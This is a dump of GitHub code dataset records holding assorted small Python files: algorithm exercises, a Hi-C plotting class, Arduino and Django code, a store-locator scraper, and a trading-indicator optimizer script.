row = ActionRow()\n row.add_components(component)\n components = rows\n data = InteractionCallbackData(content=content, embeds=embeds, flags=ephemeral, components=components)\n if self.type == 2:\n if not self._acked:\n return InteractionResponse(InteractionCallbackType.CHANNEL_MESSAGE_WITH_SOURCE, data)\n else:\n await self.http.request('POST', f'/webhooks/{self.application_id}/{self.interaction_token}', json=data)\n elif self.type == 3:\n if not self._acked:\n return InteractionResponse(InteractionCallbackType.UPDATE_MESSAGE, data)\n else:\n await self.http.request('PATCH', f'/webhooks/{self.application_id}/{self.interaction_token}/messages/@original', json=data.to_json())\n","repo_name":"random-duk/ducky-interactions","sub_path":"classes/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34526349885","text":"import sys\r\n\r\nN,K=map(int,sys.stdin.readline().split())\r\n\r\ninputs=sys.stdin.readline().strip()\r\n\r\narr=[]\r\n\r\nfor ch in inputs:\r\n if ch == 'H':\r\n arr.append(False)\r\n else:\r\n arr.append(True)\r\n# print(inputs)\r\n# print(arr)\r\n\r\ncnt=0\r\nfor i in range(len(inputs)):\r\n if inputs[i]=='H':\r\n for idx in range(max(i-K,0),min(i+K+1,len(inputs))):\r\n if arr[idx]==True:\r\n arr[idx]=False\r\n cnt+=1\r\n break\r\n\r\n\r\nprint(cnt)\r\n","repo_name":"hyun132/Algorithm_with_python","sub_path":"햄버거 분배.py","file_name":"햄버거 분배.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22779550448","text":"import matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\nfrom mpl_toolkits.axes_grid1.colorbar import colorbar\n\nimport numpy as np\nfrom scipy import ndimage\n\nfrom coolbox.utilities import (\n GenomeRange,\n change_chrom_names,\n get_logger\n)\n\nfrom coolbox.plots.track.base import TrackPlot\n\n\nlog = get_logger(__name__)\n\n\nSTYLE_TRIANGULAR = 'triangular'\nSTYLE_MATRIX = 'matrix'\nSTYLE_WINDOW = 'window'\n\nDEPTH_FULL = 'full'\n\n\nclass PlotHiCMatrix(TrackPlot):\n\n DEFAULT_COLOR = 'YlOrRd'\n\n def __init__(self, *args, **kwargs):\n TrackPlot.__init__(self, *args, **kwargs)\n\n self.__set_default_properties()\n\n self.small_value = 1e-12\n self.ax = None\n self.label_ax = None\n self.matrix = None\n self._out_of_bound = False\n\n from coolbox.utilities.hic.tools import file_type\n self.file_type = file_type(self.properties['file'])\n\n self.fetched_binsize = None\n\n def __set_default_properties(self):\n self.properties['height'] = 'hic_auto'\n\n if 'color' not in self.properties:\n self.properties['color'] = self.DEFAULT_COLOR\n if 'style' not in self.properties:\n self.properties['style'] = STYLE_TRIANGULAR\n if 'balance' not in self.properties:\n self.properties['balance'] = 'no'\n if 'color_bar' not in self.properties:\n self.properties['color_bar'] = 'yes'\n if 'transform' not in self.properties:\n self.properties['transform'] = 'no'\n if 'title' not in self.properties:\n self.properties['title'] = ''\n if 'depth_ratio' not in self.properties:\n self.properties['depth_ratio'] = DEPTH_FULL\n if 'norm' not in self.properties:\n self.properties['norm'] = 'log'\n\n @property\n def is_inverted(self):\n if 'orientation' in self.properties and self.properties['orientation'] == 'inverted':\n return True\n else:\n # default: not inverted\n return False\n\n @property\n def style(self):\n if 'style' in self.properties:\n return self.properties['style']\n else:\n # default triangular style\n return STYLE_TRIANGULAR\n\n @property\n def balance(self):\n if self.properties['balance'] == 'no':\n return False\n else:\n if self.file_type == '.hic':\n if self.properties['balance'] == 'yes':\n return 'KR' # default use KR balance\n else:\n return self.properties['balance']\n else:\n return True\n\n @property\n def is_balance(self):\n return bool(self.balance)\n\n def __transform_matrix(self, arr):\n if self.properties['transform'] == 'log10':\n arr = np.log10(arr)\n elif self.properties['transform'] == 'log2':\n arr = np.log2(arr)\n elif self.properties['transform'] == 'log':\n arr = np.log(arr)\n return arr\n\n @property\n def matrix_val_range(self):\n small = 1e-4\n arr = self.matrix\n arr_no_nan = arr[np.logical_not(np.isnan(arr))]\n\n if self.properties['min_value'] == 'auto':\n # set minimal value for color bar\n min_ = arr[arr > arr.min()].min()\n else:\n min_ = self.properties['min_value']\n\n if self.properties['max_value'] == 'auto':\n max_ = arr_no_nan.max()\n else:\n max_ = self.properties['max_value']\n\n if max_ <= min_:\n max_ = min_ + small\n\n return min_, max_\n\n def __fetch_matrix(self, genome_range, resolution='auto'):\n \"\"\"\n Fetch the matrix.\n\n Parameters\n ----------\n genome_range : coolbox.utilities.GenomeRange\n The genome range to fetch.\n\n resolution : {'auto', int}\n The matrix resolution, for multi-resolution(.hic or multi-cool) file.\n Use 'auto' to infer the resolution automatically.\n default 'auto'\n \"\"\"\n from coolbox.utilities.hic.wrap import StrawWrap, CoolerWrap\n\n path = self.properties['file']\n if self.file_type == '.hic':\n wrap = StrawWrap(path, normalization=self.balance, binsize=resolution)\n else:\n wrap = CoolerWrap(path, balance=self.balance, binsize=resolution)\n\n arr = wrap.fetch(genome_range)\n\n self.fetched_binsize = wrap.fetched_binsize # expose fetched binsize\n\n # fill zero and nan with small value\n small = self.small_value\n arr[arr == 0] = small\n arr[np.isnan(arr)] = small\n\n if 'transform' in self.properties and self.properties['transform'] != 'no':\n arr = self.__transform_matrix(arr)\n\n return arr\n\n def __get_triangular_matrix(self, arr):\n small = self.small_value\n tri_matrix = ndimage.rotate(arr, 45, prefilter=False, cval=small)\n\n rows = tri_matrix.shape[0]\n\n tri_matrix = tri_matrix[0:(rows//2 + 1), :]\n\n # cut depth\n if self.properties['depth_ratio'] != 'auto' and self.properties['depth_ratio'] != DEPTH_FULL:\n depth_ratio = float(self.properties['depth_ratio'])\n depth = int(tri_matrix.shape[0] * depth_ratio)\n tri_matrix = tri_matrix[-depth:, :]\n\n return tri_matrix\n\n def __get_window_matrix(self, arr):\n small = self.small_value\n window_matrix = ndimage.rotate(arr, 45, prefilter=False, cval=small)\n rows, cols = window_matrix.shape\n if self._out_of_bound == 'left':\n # left side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :(2*x+1)]\n elif self._out_of_bound == 'right':\n # right side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :(2*x+1)]\n elif self._out_of_bound == 'both':\n # double side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :]\n else:\n # normal\n x = cols // 4\n window_matrix = window_matrix[(rows//4):(rows//2 + 1), x:(3*x + 1)]\n\n # cut depth\n if self.properties['depth_ratio'] != 'auto' and self.properties['depth_ratio'] != DEPTH_FULL:\n depth_ratio = float(self.properties['depth_ratio'])\n depth = int(window_matrix.shape[0] * depth_ratio)\n window_matrix = window_matrix[-depth:, :]\n\n return window_matrix\n\n def __plot_matrix(self, genome_range):\n start, end = genome_range.start, genome_range.end\n ax = self.ax\n arr = self.matrix\n cmap = plt.get_cmap(self.properties['color'])\n cmap.set_bad(\"white\")\n cmap.set_under(\"white\")\n c_min, c_max = self.matrix_val_range\n\n depth_ratio = 1.0 if self.properties['depth_ratio'] == DEPTH_FULL else self.properties['depth_ratio']\n\n if self.style == STYLE_TRIANGULAR:\n # triangular style\n tri_matrix = self.__get_triangular_matrix(arr)\n img = ax.matshow(tri_matrix, cmap=cmap,\n extent=(start, end, 0, depth_ratio * (end - start)/2),\n aspect='auto')\n elif self.style == STYLE_WINDOW:\n # window style\n window_matrix = self.__get_window_matrix(arr)\n img = ax.matshow(window_matrix, cmap=cmap,\n extent=(start, end, 0, depth_ratio * (end - start)/2),\n aspect='auto')\n else:\n # matrix style\n img = ax.matshow(arr, cmap=cmap,\n extent=(start, end, end, start),\n aspect='auto')\n\n if self.properties['norm'] == 'log':\n img.set_norm(colors.LogNorm(vmin=c_min, vmax=c_max))\n else:\n img.set_norm(colors.Normalize(vmin=c_min, vmax=c_max))\n\n return img\n\n def __adjust_figure(self, genome_range):\n ax = self.ax\n start, end = genome_range.start, genome_range.end\n if self.style == STYLE_TRIANGULAR or self.style == STYLE_WINDOW:\n\n if self.properties['depth_ratio'] == DEPTH_FULL:\n depth = genome_range.length / 2\n else:\n depth = (genome_range.length / 2) * self.properties['depth_ratio']\n\n if self.is_inverted:\n ax.set_ylim(depth, 0)\n else:\n ax.set_ylim(0, depth)\n else:\n ax.set_ylim(end, start)\n ax.set_xlim(start, end)\n\n def __plot_colorbar(self, img, orientation='vertical'):\n if orientation == 'horizontal':\n ax_divider = make_axes_locatable(self.ax)\n if self.is_inverted:\n cax = ax_divider.append_axes(\"top\", size=0.09, pad=0.2)\n else:\n cax = ax_divider.append_axes(\"bottom\", size=0.09, pad=0.2)\n colorbar(img, cax=cax, orientation='horizontal')\n else: # vertical\n y_ax = self.y_ax\n\n if self.properties['norm'] == 'log':\n from matplotlib.ticker import LogFormatter\n formatter = LogFormatter(10, labelOnlyBase=False)\n aa = np.array([1, 2, 5])\n c_min, c_max = self.matrix_val_range\n\n def abs_inc(num):\n if num != 0:\n sign = num / abs(num)\n return int(sign * abs(num + 1))\n else:\n return 1\n\n lower_ = int(np.log10(c_min))\n upper_ = abs_inc(int(np.log10(c_max)))\n tick_values = np.concatenate([aa * 10 ** x for x in range(lower_, upper_)])\n\n c_bar = plt.colorbar(img, ax=y_ax, ticks=tick_values, format=formatter, fraction=0.98)\n else:\n c_bar = plt.colorbar(img, ax=y_ax, fraction=0.98)\n\n c_bar.solids.set_edgecolor(\"face\")\n c_bar.ax.tick_params(labelsize='smaller')\n\n c_bar.ax.yaxis.set_ticks_position('left')\n\n def __fetch_window_matrix(self, genome_range):\n from copy import copy\n fetch_range = copy(genome_range)\n x = (genome_range.end - genome_range.start) // 2\n fetch_range.start = genome_range.start - x\n fetch_range.end = genome_range.end + x\n\n if fetch_range.start < 0:\n fetch_range.start = genome_range.start\n self._out_of_bound = 'left'\n\n try:\n arr = self.__fetch_matrix(fetch_range)\n except ValueError as e:\n if self._out_of_bound == 'left':\n self._out_of_bound = 'both'\n arr = self.__fetch_matrix(genome_range)\n else:\n self._out_of_bound = 'right'\n fetch_range.end = genome_range.end\n arr = self.__fetch_matrix(fetch_range)\n return arr, fetch_range\n\n def plot(self, ax, chrom_region, start_region, end_region):\n self.ax = ax\n\n self._out_of_bound = False\n\n log.debug(\"plotting {}\".format(self.properties['file']))\n\n genome_range = GenomeRange(chrom_region, start_region, end_region)\n\n self.ax = ax\n\n # fetch matrix and perform transform process\n if self.style == STYLE_WINDOW:\n arr, fetch_region = self.__fetch_window_matrix(genome_range)\n self.fetch_region = fetch_region\n else:\n arr = self.__fetch_matrix(genome_range)\n\n self.matrix = arr\n\n # plot matrix\n img = self.__plot_matrix(genome_range)\n self.__adjust_figure(genome_range)\n\n # plot colorbar\n if self.properties['color_bar'] == 'yes':\n if hasattr(self, 'y_ax') and self.style == STYLE_WINDOW:\n self.__plot_colorbar(img, orientation='vertical')\n else:\n self.__plot_colorbar(img, orientation='horizontal')\n else:\n pass\n\n # plot label\n self.plot_label()\n\n def get_track_height(self, frame_width):\n \"\"\"\n calculate track height dynamically.\n \"\"\"\n if self.style == STYLE_TRIANGULAR:\n height = frame_width * 0.5\n elif self.style == STYLE_WINDOW:\n if 'height' in self.properties and self.properties['height'] != 'hic_auto':\n height = self.properties['height']\n else:\n height = frame_width * 0.3\n else:\n height = frame_width * 0.8\n\n if 'depth_ratio' in self.properties and self.properties['depth_ratio'] != DEPTH_FULL:\n if self.properties['style'] != STYLE_MATRIX:\n height = height * self.properties['depth_ratio']\n\n if 'color_bar' in self.properties and self.properties['color_bar'] != 'no':\n height += 1.5\n\n return height\n","repo_name":"raivivek/CoolBox","sub_path":"coolbox/plots/track/hicmatrix.py","file_name":"hicmatrix.py","file_ext":"py","file_size_in_byte":12979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"}
+{"seq_id":"12147505517","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n# O(min(n, m)) Time | O(1) Space\ndef merge_lists(head_1, head_2):\n new_head = Node(None)\n tail = new_head\n current_1 = head_1\n current_2 = head_2\n \n while current_1 is not None and current_2 is not None:\n if current_1.val < current_2.val:\n tail.next = current_1\n current_1 = current_1.next\n else:\n tail.next = current_2\n current_2 = current_2.next\n tail = tail.next\n if current_1 is not None: tail.next = current_1\n if current_2 is not None: tail.next = current_2\n \n return new_head.next","repo_name":"JeffersonGarcia15/Data-Structures-Algorithms","sub_path":"data_structures/merge_lists.py","file_name":"merge_lists.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"33078129205","text":"import pyfirmata\nfrom pyfirmata import Arduino, util\nimport time\nimport math\n\nboard = Arduino('COM3')\n\n#pin = board.get_pin('a:0:i') #analog pin 0 input\n\ncontrol = board.analog[1]\n\niterator = util.Iterator(board)\niterator.start()\ntime.sleep(0.1)\n\ntry:\n while True:\n control.enable_reporting()\n val = control.read()\n\n if(val == None):\n continue\n\n val = val*10\n\n if(val == 0):\n val = 1\n\n val = math.ceil(val)\n \n print(str(val))\n\n time.sleep(0.1)\n\nexcept KeyboardInterrupt:\n board.exit()\n","repo_name":"rdaw6/Dancing-Lights--Sr-Design","sub_path":"Indv Controls Tests/potentiometer_test.py","file_name":"potentiometer_test.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"8229248895","text":"import unittest\nimport requests\nimport json\nimport sys\nsys.path.append(\"../..\") # 提升2级到项目根目录下\n\nfrom lib.read_excel import * # 从项目路径下导入\nfrom lib.case_log import log_case_info # 从项目路径下导入\n\n\nclass BaseCase(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n if cls.__name__ != 'BaseCase':\n cls.data_list = excel_to_list(data_file, cls.__name__)\n\n def get_case_data(self, case_name):\n return get_test_data(self.data_list, case_name)\n\n def send_request(self, case_data):\n case_name = case_data.get('case_name')\n url = case_data.get('url')\n args = case_data.get('args')\n expect_res = case_data.get('expect_res')\n method = case_data.get('method')\n data_type = case_data.get('data_type')\n\n if method.upper() == 'GET':\n res = requests.get(url=url, params=json.loads(args))\n\n elif data_type.upper() == 'FORM':\n res = requests.post(url=url, data=json.loads(args))\n log_case_info(case_name, url, args, expect_res, res.text)\n self.assertEqual(res.text, expect_res)\n else:\n res = requests.post(url=url, json=json.loads(args))\n log_case_info(case_name, url, args, json.dumps(json.loads(expect_res), sort_keys=True),\n json.dumps(res.json(), ensure_ascii=False, sort_keys=True))\n self.assertDictEqual(res.json(), json.loads(expect_res))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n print(issubclass(BaseCase,BaseCase))","repo_name":"hanzhichao/api_test_framework","sub_path":"test/case/basecase.py","file_name":"basecase.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"42392983260","text":"import re\n\nfrom scrapy import FormRequest\nfrom scrapy.http import Response\n\nfrom StoreScraper.items import StoreItem\nfrom StoreScraper.spiders import base_spider\n\n\nclass PanasonicSpider(base_spider.BaseSpider):\n name = \"panasonicproclub.com\"\n\n def start_requests(self):\n post_data = {\n 'geo': '0',\n 'lat': '51.165691',\n 'lng': '10.451526',\n 'address': 'Deutschland',\n 'selected_list': '36',\n 'distance': '500',\n 'search': ''\n }\n yield FormRequest(url='https://www.panasonicproclub.com/ifinder/DE_de/home/', formdata=post_data)\n\n def parse(self, response: Response, **kwargs):\n values = re.findall(r'marcadores\\[(\\d+)]\\[(\\d+)]\\s*=\\s*\"(.*?)\";', response.text)\n results = dict()\n for row_index, column_index, value in values:\n if row_index not in results:\n results[row_index] = {\n 'Source': self.name\n }\n if column_index == '0':\n results[row_index]['Name1'] = value\n if column_index == '1':\n results[row_index]['Address'] = value\n if column_index == '99':\n results[row_index]['Zip'] = value\n if column_index == '100':\n results[row_index]['City'] = value\n if column_index == '3':\n results[row_index]['Phone'] = value\n if column_index == '4':\n results[row_index]['Email'] = value\n if column_index == '5':\n results[row_index]['Website'] = value\n if column_index == '6':\n results[row_index]['Latitude'] = value\n if column_index == '7':\n results[row_index]['Longitude'] = value\n for key, value in results.items():\n parsed_result = StoreItem(**value)\n yield self.add_unique_address_id(parsed_result)\n","repo_name":"ptsonev/StoreScraper","sub_path":"StoreScraper/spiders/panasonic_spider.py","file_name":"panasonic_spider.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"1034970260","text":"peso = 0\n\nmaior = 0\n\nmenor = 500\n\nfor c in range (1,6):\n\n peso = float(input('Qual o peso da {}º pessoa? (kg)'.format(c)))\n\n if peso>maior:\n\n maior = peso\n\n elif peso int:\n i = 0\n tempArea = 0\n arLength = len(height)\n for i in range(arLength):\n for j in range(i+1,arLength):\n if height[i] > height[j]:\n area = height[j] * (j-i)\n else:\n area = height[i] * (j-i)\n if area > tempArea:\n tempArea = area\n print(\"area:\"+str(area))\n print(\"temparea:\"+str(tempArea))\n \n return tempArea\n\n #viewed solution\n def maxArea(self,height: list[int]) -> int:\n left = 0\n right = len(height)-1\n area = 0\n while right > left:\n tarea = min(height[left], height[right]) * (right - left)\n\n if tarea > area:\n area = tarea\n \n if height[left] < height[right]:\n left = left + 1\n elif height[left] > height[right]:\n right = right - 1\n else:\n left = left + 1\n right = right - 1\n return area\n\nS1 = Solution()\nheight = [1,8,6,2,5,4,8,3,7]\nprint(S1.maxArea(height))\n\n\n\n","repo_name":"ocnow/CodeProblems","sub_path":"LeetCode/container-with-most-water.py","file_name":"container-with-most-water.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"36205162908","text":"'''\nProblem Description: \nFind the pairs comprising of two elements, inside an array.\n\nInput : array = [1,2,31,55,3,4,5,6,19] / target = 50\nOutput : [31,19]\n'''\n\nimport time\n\n\n## Method 1: Brute Force Aproach\ndef pairSumV1(nums,target):\n res = []\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n if(nums[i],nums[j] == target):\n res.append([nums[i],nums[j]])\n return res\n\n\n## Method 2: Sorted Only, Implemented using general Double Pointer Approach\ndef pairSumV2(nums, target):\n res = []\n start, end = 0, len(nums)-1\n while(start < end):\n _sum = nums[start] + nums[end]\n if(_sum == target):\n res.append([nums[start], nums[end]])\n start += 1\n end -= 1\n elif(_sum > target):\n end -= 1\n elif(_sum < target):\n start += 1\n return res if res else []\n\n\n## Method 3: Pair Sum, Implemented on unsorted Array using Hashset;\ndef pairSumV3(nums, target):\n temp = {}\n res = []\n for (key,value) in enumerate(nums): # enumerate(nums) => key:value;\n needed = target-value\n if needed in temp:\n res.append([needed, value])\n else:\n temp[value]=key\n return res\n\ndef main():\n try:\n # res = pairSumV1(nums=[9,8,21,46,23,45,1,2,3,4,5], target=50) # Unsorted\n res1 = pairSumV2(nums=[1, 2, 3, 4, 5, 8, 9, 21, 23, 45, 46], target=50) # Sorted\n res2 = pairSumV3(nums=[9, 8, 21, 46, 23, 45, 1, 2, 3, 4, 5], target=50) # Unsorted\n print(res1) if res1 else print(\"Empty!\")\n print(res2) if res2 else print(\"Empty!\")\n \n except(Exception) as e:\n print(f\"Exception Traced : {e}\")\n \n else:\n print(\"Program Completed : Success\")\n\n finally:\n print(\"Program Terminated!\")\n\n \nif __name__ == '__main__':\n print(\"#------------ Code Start --------------#\")\n startTime = time.time()\n main()\n endTime = time.time()\n print(\"Run Time:\",endTime-startTime,\"ms\")\n print(\"#------------ Code Stop ----------------#\")\n ","repo_name":"neerajsinghjr/dsa","sub_path":"coding-minutes/01.Array/P001_Sort_array_Pair_Sum.py","file_name":"P001_Sort_array_Pair_Sum.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"12238736870","text":"import numpy as np\n\n# this script will solve a system of linear equations\n# to determine the optimal angular offsets to align Pmx\n\n#dPmx = E'*cos(theta_e)*dtheta_e - pf*cos(theta_p)dtheta_p\n#dPmz = E'*sin(theta_e)*dtheta_e + pf*sin(theta_p)dtheta_p\n\n\na_00 = 3. # Ef * np.cos(theta_e)\na_01 = 2 #-pf * np.cos(theta_p)\na_10 = 0 # Ef * np.sin(theta_e)\na_11 = 6 # pf * np.sin(theta_p)\n\n\nA = np.array([[a_00, a_01], \n [a_10, a_11]])\n\nA_inv = np.linalg.inv(A)\n\n#dth = [ dtheta_e, dtheta_p ]\n#dPm = [ dPmx, dPmz ]\n\n\nresult = A_inv.dot(x)\nprint('result=',result)\n\n","repo_name":"Yero1990/cafe_offline_replay","sub_path":"post_analysis/special_studies/heep_check/calculate_offsets.py","file_name":"calculate_offsets.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"14169788407","text":"import random\nsecret =random.randint(1,10)\ntimes = 3\nguess = 0\nprint(\"来,猜猜哥现在心里想的数字是几.\", end=\"\")\nwhile (guess != secret) and (times > 0):\n temp = input('请在此处输入')\n guess = int(temp)\n times = times - 1\n if guess == secret:\n print('恭喜你,答对了!')\n print('哼,答对也没有奖励哦')\n else:\n if guess > secret:\n print('大了大了')\n else:\n print('小了小了')\n if times > 0:\n print('再来一次,')\n else:\n print('对不起,机会用完喽')\nprint(\"游戏结束,谢谢参与!\")\n","repo_name":"unclelaozhang/Python_fishc","sub_path":"改进小游戏独立完成.py","file_name":"改进小游戏独立完成.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72450674669","text":"notas = input()\nnota1 = ''\nvar = True\n\nwhile var:\n for v in notas:\n if v.isdigit() or v == '.':\n nota1 += v\n else:\n var = False\n break\n\nnota2 = ''.join(x for x in notas if x not in nota1)\n\nif nota2 == ' ':\n nota2 += notas[0]\n nota2 += notas[1]\n\nmedia = (float(nota1) + float(nota2)) / 2\n\nif media >= 7:\n print('Aprovado')\n\nelif media >= 4:\n print('Recuperacao')\n\nelse:\n print('Reprovado')","repo_name":"gabrielbelo2007/Activities","sub_path":"Activities (NEPS)/Aprovado ou Reprovado.py","file_name":"Aprovado ou Reprovado.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"44348204317","text":"import tkinter as tk\r\nfrom tkinter import simpledialog\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.withdraw()\r\n value = simpledialog.askstring(\"Entrada\", \"Ingresa un valor:\")\r\n root = tk.Tk()\r\n root.withdraw()\r\n value = simpledialog.askstring(\"Entrada\", \"Ingresa un valor:\")\r\n if value is not None:\r\n print(\"Valor ingresado:\", value)\r\n else:\r\n print(\"Ningún valor ingresado.\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"CaDelTo/Cado-Project","sub_path":"ConsolaTryOut.py","file_name":"ConsolaTryOut.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26917068943","text":"# pylint: disable=missing-module-docstring\n# pylint: disable=missing-class-docstring\n# pylint: disable=missing-function-docstring\n\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom rest_framework import generics\nfrom hangrymealsapi.models import RecipeIngredients, Recipe, Ingredient\n\n\n\nclass RecipeIngredientsSerializer(serializers.ModelSerializer):\n class Meta:\n model = RecipeIngredients\n fields = ('id', 'recipe', 'ingredient')\n depth = 2\n\n\nclass RecipeIngredientsView(ViewSet):\n\n def retrieve(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n serializer = RecipeIngredientsSerializer(recipeingredients)\n return Response(serializer.data)\n\n def list(self, request):\n recipeingredients = RecipeIngredients.objects.all()\n recipe = request.query_params.get('recipe', None)\n if recipe is not None:\n recipe = recipeingredients.filter(recipe=recipe.id)\n ingredient = request.query_params.get('ingredient', None)\n if ingredient is not None:\n ingredient = recipeingredients.filter(ingredient=ingredient.id)\n serializer = RecipeIngredientsSerializer(recipeingredients, many=True)\n return Response(serializer.data)\n\n def create(self, request):\n recipe = Recipe.objects.get(pk=request.data[\"recipe\"])\n ingredient = Ingredient.objects.get(pk=request.data[\"ingredient\"])\n recipeingredients = RecipeIngredients.objects.create(\n recipe=recipe,\n ingredient=ingredient,\n )\n serializer = RecipeIngredientsSerializer(recipeingredients)\n return Response(serializer.data)\n\n def update(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n recipe = Recipe.objects.get(pk=request.data[\"recipe\"])\n ingredient = Ingredient.objects.get(pk=request.data[\"ingredient\"])\n recipeingredients.recipe = recipe\n recipeingredients.ingredient = ingredient\n recipeingredients.save()\n\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n def destroy(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n recipeingredients.delete()\n return Response(None, status=status.HTTP_204_NO_CONTENT)\nclass ByRecipeIngredientsView(generics.ListCreateAPIView):\n serializer_class = RecipeIngredientsSerializer\n\n def get_queryset(self):\n recipe_id = self.kwargs['recipe_id']\n return RecipeIngredients.objects.filter(recipe__id=recipe_id)\n","repo_name":"shalane-proctor/hangry-meals-server","sub_path":"hangrymealsapi/views/recipeingredients.py","file_name":"recipeingredients.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"41259498056","text":"class Solution:\n def plusOne(self, digits: 'List[int]') -> 'List[int]':\n i = len(digits)-1\n cnt = 1\n while i >= 0:\n if digits[i]+cnt >= 10:\n digits[i], cnt = 0, 1\n i -= 1\n else:\n digits[i] += cnt\n return digits\n if cnt != 0:\n return [1]+digits\n else:\n return digits\n\n\nif __name__ == \"__main__\":\n print(\n Solution().plusOne(\n [0]\n )\n )","repo_name":"kimroniny/ACM","sub_path":"LeetCode/0066/66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"28531364937","text":"'''\nThis file uses the class `TechnicalIndicatorOptimizer`\nthat I created to optimize the technical indicators\nand build a dashboard to compare the results of the different indicators\nThis is a very slow process and will take a long time to run.\nI'm sure there is a LOT of room for improvement here.\n'''\n\nfrom ta_optimizer import TechnicalIndicatorOptimizer\nimport logging\nimport os\nimport pandas_ta as ta\nimport pandas as pd\n\n# Configure logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\n# Load data into a Pandas DataFrame\ndf = pd.read_csv('data/btc.csv', parse_dates=True, index_col=0)\nmodel_store = 'models/'\nos.makedirs(model_store, exist_ok=True) # create the models directory if it doesn't exist\n\n\n# SMA\nlogging.info(\"Optimizing SMA\")\nsma_optimizer = TechnicalIndicatorOptimizer(\n df, \n ta.sma, \n \"sma\", \n \"length\", \n [5, 10, 20, 50, 100], \n [5, 30, 60, 90, 120]\n)\nsma_best_result = sma_optimizer.optimize()\nprint(\"SMA Best Result:\", sma_best_result)\n\n# EMA\nlogging.info(\"Optimizing EMA\")\nema_optimizer = TechnicalIndicatorOptimizer(\n df, \n ta.ema, \n \"ema\", \n \"length\", \n [5, 10, 20, 50, 100], \n [5, 30, 60, 90, 120]\n)\nema_best_result = ema_optimizer.optimize()\nprint(\"EMA Best Result:\", ema_best_result)\n\n# Stochastic\nlogging.info(\"Optimizing Stochastic\")\nstoch_optimizer = TechnicalIndicatorOptimizer(\n df,\n None,\n \"stoch\",\n [\"k_period\", \"d_period\"],\n [(5, 3), (14, 3), (14, 5)],\n [5, 30, 60, 90, 120],\n indicator_type='stochastic'\n)\nstoch_best_result = stoch_optimizer.optimize()\nprint(\"Stochastic Best Result:\", stoch_best_result)\n\n# Plot the analysis results for the two different moving average indicators\nsma_results = [sma_optimizer.evaluate_indicator_param(param_value) for param_value in sma_optimizer.param_values]\nema_results = [ema_optimizer.evaluate_indicator_param(param_value) for param_value in ema_optimizer.param_values]\n# Generate the analysis results for the different Stochastic parameter values\nstoch_results = [stoch_optimizer.evaluate_indicator_param(param_value) for param_value in stoch_optimizer.param_values]\n\n\nlogging.info(\"Plotting SMA Analysis Dashboard\")\nsma_optimizer.plot_analysis_dashboard(\n sma_results, title='SMA Optimization Dashboard')\nlogging.info(\"Plotting EMA Analysis Dashboard\")\nema_optimizer.plot_analysis_dashboard(\n ema_results, title='EMA Optimization Dashboard')\nlogging.info(\"Plotting Stochastic Analysis Dashboard\")\nstoch_optimizer.plot_analysis_dashboard(\n stoch_results, title='Stochastic Optimization Dashboard')\n","repo_name":"eervin123/feature-engineering","sub_path":"random-forest/run_optimizer.py","file_name":"run_optimizer.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
